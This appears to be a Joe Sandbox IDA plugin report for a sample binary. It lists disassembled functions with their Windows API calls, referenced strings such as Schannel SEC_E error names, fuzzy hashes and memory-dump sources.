Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_CANNOT_INSTALL
API String ID: 1452528299-3689135316
Opcode ID: 9daf5c159f35477d2cfe39f76e5e7c2033782e7558094459004d51f560fd1d6c
Instruction ID: 0f7a9de6c8afa0a46aa10639ba339b6374d2946461d5521855d3d2e10b10e14a
Opcode Fuzzy Hash: 9daf5c159f35477d2cfe39f76e5e7c2033782e7558094459004d51f560fd1d6c
Instruction Fuzzy Hash: 02019222B0864286F711BF91A0401FAE291EF847A4FC80136EA1E427D1DFBCE581CBB0

Function 00007FF7F12C548B Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC
SEC_E_DELEGATION_REQUIRED, xrefs: 00007FF7F12C548B

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_DELEGATION_REQUIRED
API String ID: 1452528299-3988574617
Opcode ID: 2d156049574ab5650331bff3d0b0abbf862625c5e78bb5a2c5e7f96011c5247f
Instruction ID: 4a0f396c073bb5617dd841b17e5c52edb976d3595de114bfb3ec43c74a6f707f
Opcode Fuzzy Hash: 2d156049574ab5650331bff3d0b0abbf862625c5e78bb5a2c5e7f96011c5247f
Instruction Fuzzy Hash: 58019222B0864286F711BF91A4401FAE291EF847A4FC80136DA2E427C5DFBCE581CBB0

Function 00007FF7F12C547F Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC
SEC_E_DELEGATION_POLICY, xrefs: 00007FF7F12C547F

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_DELEGATION_POLICY
API String ID: 1452528299-829877842
Opcode ID: 81e1de54d1116b02e66ce1c65efcf73dc226e2910f5ff0574cfe61c8a9d2bf15
Instruction ID: fcfe88cbaf4d8d2be9b6190f1030afb5a569c26df83692d8cbc006bc07b6fb83
Opcode Fuzzy Hash: 81e1de54d1116b02e66ce1c65efcf73dc226e2910f5ff0574cfe61c8a9d2bf15
Instruction Fuzzy Hash: 2F019222B0864286F711BF91A4401FAE291FF847A4FC80136EA1E427C1DFBCE581CBB0

Function 00007FF7F12C5473 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC
SEC_E_DECRYPT_FAILURE, xrefs: 00007FF7F12C5473

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_DECRYPT_FAILURE
API String ID: 1452528299-1043736155
Opcode ID: 9a62bc3d6a2c19295cc0a3be99a7a29b01af618fb579ffec2b1fb00194208109
Instruction ID: fc29df9880e878ff04633957ad5f89e4eb22ebf9cb6883635dcb6930aed10bdb
Opcode Fuzzy Hash: 9a62bc3d6a2c19295cc0a3be99a7a29b01af618fb579ffec2b1fb00194208109
Instruction Fuzzy Hash: 7C019222B0864286F711BF91A4401FAE291EF847A4FC80136DA1E427C1DFBCE581CBB0

Function 00007FF7F12C5467 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC
SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 00007FF7F12C5467

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_CRYPTO_SYSTEM_INVALID
API String ID: 1452528299-3331766186
Opcode ID: 3715786bb4aac3babbd226584138160f4850d073428448af691232985c4c6c76
Instruction ID: cbf2e68bbd4bb4d8f17364293ffe23d072e4e957283d26732422cd326617f32e
Opcode Fuzzy Hash: 3715786bb4aac3babbd226584138160f4850d073428448af691232985c4c6c76
Instruction Fuzzy Hash: 1D019222B0864286F711BF91A4401FAE291EF847A4FC80136DA1E427C1DFBCE581CBB0

Function 00007FF7F12C545B Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 00007FF7F12C545B
%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_CROSSREALM_DELEGATION_FAILURE
API String ID: 1452528299-3852342135
Opcode ID: adeba84714067579b486a80663df9f4757600ad79abecc6a7c53b5d2d7b3fb97
Instruction ID: 5229131193da1aad889ad2201350a7f7c7edb9fe56a90496001976c5584a5868
Opcode Fuzzy Hash: adeba84714067579b486a80663df9f4757600ad79abecc6a7c53b5d2d7b3fb97
Instruction Fuzzy Hash: 3A018022B0864286F711BF91A4401FAE291AF847A4FC80136EA1E426C1DFBCE581CBB0

Function 00007FF7F12C54AF Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

SEC_E_INCOMPLETE_CREDENTIALS, xrefs: 00007FF7F12C54AF
%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_INCOMPLETE_CREDENTIALS
API String ID: 1452528299-1320471878
Opcode ID: 98eb5c07ee6d923311b581e697e50350d1e267376b22d1eaef65fc943e2e01a7
Instruction ID: 53ee42037be3dda5f93809af59e3934ea6d34800ed1f2a5c50e25eb2bc8fda32
Opcode Fuzzy Hash: 98eb5c07ee6d923311b581e697e50350d1e267376b22d1eaef65fc943e2e01a7
Instruction Fuzzy Hash: 36019222B0864286F711BF91A4401FAE391EF847A4FC80136EA5E427D5DFBCE581CBB0

Function 00007FF7F12C54A3 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC
SEC_E_ENCRYPT_FAILURE, xrefs: 00007FF7F12C54A3

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_ENCRYPT_FAILURE
API String ID: 1452528299-3371550302
Opcode ID: 681d8786de94ca0bf05ec348a8407953c362b8b248bda307549e02da190198e6
Instruction ID: 0dc0c1de3370c04a22e4e3e73ac4a6f12993a4dac5f3817d348d0fb658f292ec
Opcode Fuzzy Hash: 681d8786de94ca0bf05ec348a8407953c362b8b248bda307549e02da190198e6
Instruction Fuzzy Hash: C9019222B0864286F711BF91A0401FAE291EF847A4FC80136DA5E467C1DFBCE581CBB0

Function 00007FF7F12C5497 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC
SEC_E_DOWNGRADE_DETECTED, xrefs: 00007FF7F12C5497

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_DOWNGRADE_DETECTED
API String ID: 1452528299-1814928707
Opcode ID: d28a49420191b8733ad25d842b31019e11652f5cbe7bb077410a18514324a075
Instruction ID: 073feb782998f846426743776346c0079401172b080ceee49c783dd1b848fbc4
Opcode Fuzzy Hash: d28a49420191b8733ad25d842b31019e11652f5cbe7bb077410a18514324a075
Instruction Fuzzy Hash: 4A019222B0864286F711BF91A0401FAE291EF847A4FC80136DA5E427C1DFBCE581CBB0

Function 00007FF7F12C5413 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

SEC_E_BUFFER_TOO_SMALL, xrefs: 00007FF7F12C5413
%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_BUFFER_TOO_SMALL
API String ID: 1452528299-3213503683
Opcode ID: 52c302cbd59e8379f98d3a1802b7cc2a73fc9db103624da0e740cd3d605cfd90
Instruction ID: 1ffc1050a49701566fb8a96aa641a282e12b04b0f3e11f4a0e45897bcadae8e5
Opcode Fuzzy Hash: 52c302cbd59e8379f98d3a1802b7cc2a73fc9db103624da0e740cd3d605cfd90
Instruction Fuzzy Hash: 1C019222B0864286F715BF91A0401FAE291EF847A4FC80136DA5E427C1DFBCE581CBB0

Function 00007FF7F12C540A Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC
SEC_E_BAD_PKGID, xrefs: 00007FF7F12C540A

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_BAD_PKGID
API String ID: 1452528299-428854770
Opcode ID: b9c5434bdcfc51da69b0d64449c845420c1526d4885dbfea43497ebcfda996a2
Instruction ID: 2e221c53dde6e9f483ad1427d7318b5db7b3f79e2e27001c0ce31e222a21ce9f
Opcode Fuzzy Hash: b9c5434bdcfc51da69b0d64449c845420c1526d4885dbfea43497ebcfda996a2
Instruction Fuzzy Hash: 92019222B0864286F711BF91A0401FAE291EF847A4FC8013ADA5E427C1DFBCE581CBB0

Function 00007FF7F12C5401 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC
SEC_E_BAD_BINDINGS, xrefs: 00007FF7F12C5401

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_BAD_BINDINGS
API String ID: 1452528299-4193802906
Opcode ID: f56b8771fc51f5f3279d0fe50af72ee861edcf998c4d63b746adcc0f9d3e3b09
Instruction ID: 0eacde21626b5bbf4ab7479cb434b7f3751730f137792dcac4114db719aee028
Opcode Fuzzy Hash: f56b8771fc51f5f3279d0fe50af72ee861edcf998c4d63b746adcc0f9d3e3b09
Instruction Fuzzy Hash: 64019222B0864286F711BF91A0401FAE291EF847A4FC80136EA1E427C1DFBCE581CBB0

Function 00007FF7F12FAA00 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7F12FAA2C
GetCurrentThreadId.KERNEL32 ref: 00007FF7F12FAA3A
GetCurrentProcessId.KERNEL32 ref: 00007FF7F12FAA46
QueryPerformanceCounter.KERNEL32 ref: 00007FF7F12FAA56

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: e3efa84a33425bf3599075b9e91b157449be3bddb301149fd16c82d366f109b1
Instruction ID: 4794a646e90e7901ff4094b4a626ad7f183658a91d81be20afe10ec363f46394
Opcode Fuzzy Hash: e3efa84a33425bf3599075b9e91b157449be3bddb301149fd16c82d366f109b1
Instruction Fuzzy Hash: 66113322B14F058AEB00DF60E8552B873B4FB19758F841D35EE6D86794DF78E1588390

Function 00007FF7F12C53B7 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

SEC_E_ALGORITHM_MISMATCH, xrefs: 00007FF7F12C53B7
%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_ALGORITHM_MISMATCH
API String ID: 1452528299-3091687665
Opcode ID: 71e1427b8772e10c730b27d4480ede672be9ca382ff8b5f88153a1fd3c35ae70
Instruction ID: 6a5d37d99b7d42f9c4eec5db80c5554ca0008faedb3dadf1067717362cfe1776
Opcode Fuzzy Hash: 71e1427b8772e10c730b27d4480ede672be9ca382ff8b5f88153a1fd3c35ae70
Instruction Fuzzy Hash: 8F019222B1864286F711BF51E0401FAE251EF84794FC80136DA1E427C1DFBCE081CBB0

Function 00007FF7F1293E04 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 272COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F12941B6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F12941BC

Strings

0, xrefs: 00007FF7F1293E6D

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: 0
API String ID: 3668304517-4108050209
Opcode ID: 6262ba0a505497cbf118712e0f1702e3b4993a8ac86477dae53376ad7317d42f
Instruction ID: 25fdb2a24521c3efc464d385489351edc17dceb0fd3239088557f582aedeed4d
Opcode Fuzzy Hash: 6262ba0a505497cbf118712e0f1702e3b4993a8ac86477dae53376ad7317d42f
Instruction Fuzzy Hash: 70B1A363F08B8585EB10DFB9D1402ECA3B1EB58B98F804225DE6D67B89DF78D545C350

Function 00007FF7F1322954 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F13222B0: GetOEMCP.KERNEL32(00000000,00000647,00007FF7F132292A,00007FF7F131388E), ref: 00007FF7F13222DA

IsValidCodePage.KERNEL32(00000000,00000647,00007FF7F132292A,00007FF7F131388E), ref: 00007FF7F13229C1
GetCPInfo.KERNEL32 ref: 00007FF7F1322A05

Strings

COMSPEC, xrefs: 00007FF7F132295E

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: COMSPEC
API String ID: 546120528-1631433037
Opcode ID: 716c4281b20af5855eed3fcffdd6e4990f84bd3080259622a2ccce696bb3e0e8
Instruction ID: 5ce8991dea33032d63b1997eafbd7a3ed7d2c26114f81644a879020b4125fe26
Opcode Fuzzy Hash: 716c4281b20af5855eed3fcffdd6e4990f84bd3080259622a2ccce696bb3e0e8
Instruction Fuzzy Hash: 23819F62A086C287F775BF259850179FAA1EF44740F99407EC6AE07AD1DFBCE541C3A0

Function 00007FF7F12CBF70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON

Download Yara Rule

Strings

select/poll on SSL socket, errno: %d, xrefs: 00007FF7F12CC17D
schannel: timed out sending data (bytes sent: %zd), xrefs: 00007FF7F12CC1A2

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
API String ID: 0-3891197721
Opcode ID: 8833624f6f39a0f5345e63ed889a8bfc00f102e4eb991627d69e7167e146596f
Instruction ID: 03b8fcc6fcc5d7f679b75cfa0408eda079986a7ea87722f3ad3143d8a96e0bcd
Opcode Fuzzy Hash: 8833624f6f39a0f5345e63ed889a8bfc00f102e4eb991627d69e7167e146596f
Instruction Fuzzy Hash: 0D71A032B047418AF710EBAAD8446AD73A5AB48BB8F814235DF3D977D4DFB8A415C390

Function 00007FF7F13012B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7F13012DA

Strings

csm, xrefs: 00007FF7F130146E
csm, xrefs: 00007FF7F13012FF

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: d27c20c6db0fcab9b5cee18de44c2c6736b35de5fcdb5a059b8b6961fdeac583
Instruction ID: 23b6d0a9c79813a818d851e8472575633543c672a6cf07fb8ccb4a7491eca2e5
Opcode Fuzzy Hash: d27c20c6db0fcab9b5cee18de44c2c6736b35de5fcdb5a059b8b6961fdeac583
Instruction Fuzzy Hash: 5E719F72A0868187DB61AF25904077DFBE0FF01B88F98813ADEAD57AC5CB6CD451C790

Function 00007FF7F1327658 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7F1321A50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1321A83

_get_daylight.LIBCMT ref: 00007FF7F1327770
_get_daylight.LIBCMT ref: 00007FF7F1327781

Strings

?, xrefs: 00007FF7F1327701

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 37a553c7527bd543dc6276df0fd9bd9768d557c111b77fafda1d1b197a3b9ba2
